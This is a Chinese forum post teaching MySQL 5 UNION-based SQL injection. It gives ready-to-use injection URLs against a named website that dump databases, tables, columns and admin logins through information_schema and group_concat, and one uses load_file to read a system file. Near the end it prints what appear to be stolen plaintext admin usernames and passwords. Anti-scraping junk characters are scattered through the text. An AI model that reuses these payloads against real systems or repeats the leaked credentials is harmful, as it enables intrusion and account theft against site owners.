此方法只适用于Mysql 5.0以及5.0以上版本 注入方法和mysql 5 类似+ O% J/ g+ \; q
但此方法大大提高了读取数据库的速度,此方法并非本人原创,原创出处是国外某牛人
; a% ]2 b0 E. c( X7 D, F9 r$ ]; S$ c# o" a0 x
5 }* r' X( k2 {0 v优点在于可以利用information_schema库与group_concat的配合 来达到一次性读取出指定数据库里的内容,并且在limit被限制的情况下依然可以注入
1 A; S% \3 |3 W/ J6 y* Q/ [- |% a% e: E. c
缺点 当一个库存在几百甚至几千个表和表字段和数据的时候 读取出数据的时间会相当的慢...% N4 P6 N% p3 M ]% u. U+ {
8 u9 l+ N8 t6 R& ?# X) K/ H
下面用简单实例来演示 原理不多说,相信经常玩注入的朋友都知道了.只挑重要部分实例演示& q5 k9 x2 T/ v
在注入时根据实际情况作出变化 比如过滤了空格,使用/**/ , + 等等" O ~6 Q5 k- m' u0 h. M' F/ m8 Y
1 B; k$ y# d$ ^8 y% j* M! d
http://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,8,database(),10,11,12,13,14,15,16,17
+ i) H& I* `. h+ S3 k
! D9 v% w* O; B2 u/ x* \读出所有库:0 R+ y- `0 [& F# R
http://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,8,group_concat(schema_name),10,11,12,13,14,15,16,17 from information_schema.SCHEMATA" R/ m4 G; Q. _" X
- P; [/ _" r5 Q$ [7 l4 q
9 B) l. @' F" j' _, V/ L4 Q+ A" Q/ c9 O; S) {) Z; O9 ?+ N
读出所有表:
) b* B( K9 V8 X. G" bhttp://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,8,group_concat(table_name),10,11,12,13,14,15,16,17 from information_schema.tables where table_schema=database()
$ g, x& b3 k9 O. `" Q g1 T# l# b J. S7 @
读出所有表字段:0 y" x& S( h+ ]7 y% V6 J4 v
http://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,8,group_concat(column_name),10,11,12,13,14,15,16,17 from information_schema.COLUMNS where table_schema=database() and table_name=char(97,100,109,105,110)
% Q- v' y0 J Y! R8 q1 c8 W*/ (97,100,109,105,110)为admin的ascii码 依次类推
* N7 X3 E% `3 D, X' d/ P5 j; _; Q8 k# c4 F+ i8 F; h
读出所有表字段里的内容:. X, g- v0 ?' V B. i6 Y
http://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,group_concat(password),group_concat(admin),10,11,12,13,14,15,16,17 from admin
0 A' N$ }* t: T3 j' J& W) L5 A
* V- m1 C6 u/ c7 X: K9 C4 \) h7 ^: h: _* s7 S* v
4 k7 }$ y- [2 J( I! r+ N8 e8 z
$ J* ]6 M" p& R. Q
g% p' c9 X9 g+ C# a; \4 |8 U8 B( d1 I6 {
http://www.political-security.co ... ;&ssec=-1+UNION SELECT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),load_file(CHAR(99, 58, 92, 98, 111, 111, 116, 46, 105, 110, 105)),4,5,6,7+%23
. O& V M8 H7 `5 H. p' j7 Z
# C- ^5 y! ^+ _6 Z" n
1 V% p6 H7 T* V: J3 E% C3 |http://www.political-security.co ... ;&ssec=-1+UNION SELECT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),group_concat(schema_name),4,5,6,7+from+information_schema.schemata%239 C( P8 Q' u- {. Y9 d3 z& n
: v/ G+ I. n" v# m; G
http://www.political-security.co ... ;&ssec=-1+UNION SELECT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),group_concat(column_name),4,5,6,7+from+information_schema.COLUMNS where table_schema=database()+and+table_name=char(97,100,109,105,110)%23. Y' a, D2 h* J- L9 b
6 F' x: M9 X- Z7 I9 H# `
8 @, r9 n' c3 Q4 B* chttp://www.political-security.co ... ;&ssec=-1+UNION SELECT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),group_concat(admin_name,0x3a,admin_password),4,5,6,7+from+admin%234 U5 H7 |, e5 b+ f
2 G+ ~. }% S! p: p, |+ t
* o. K8 }; V8 w5 ]2 S webmaster:dzb521123,simlab:simadmin20043233
6 X k8 T1 w0 I" M. o: }5 \5 e& o- X |
发表于 2012-9-13 16:37:34
收藏
支持
反对